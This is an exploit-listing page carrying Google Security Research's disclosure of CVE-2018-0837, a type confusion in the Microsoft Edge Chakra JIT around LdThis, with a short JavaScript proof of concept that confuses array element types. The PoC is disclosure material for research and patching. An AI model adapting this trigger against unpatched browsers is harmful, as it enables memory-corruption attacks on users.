[] NeoSense
E X P L O I T S
title author type platform port cve id

Microsoft Edge Chakra JIT - 'LdThis' Type Confusion

Author: Google Security Research
type: dos
platform: windows
port: 
date_added: 2018-02-15 
date_updated: 2018-02-15 
verified: 1 
codes: CVE-2018-0837 
tags: Type Confusion
aliases:  
screenshot_url:  
application_url: 
/*
LdThis instructions' value type is assumed to be "Object". Since "this" can be other objects like an array, it has to be assumed to be "LikelyObject", otherwise, operations to "this" will not be checked properly.

PoC:
*/

function opt(arr) {
    arr[0] = 1.1;
    this[0] = {};
    arr[0] = 2.3023e-320;
}

function main() {
    let arr = [1.1];
    for (let i = 0; i < 10000; i++) {
        opt.call({}, arr);
    }

    opt.call(arr, arr);
    print(arr);
}

main();
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.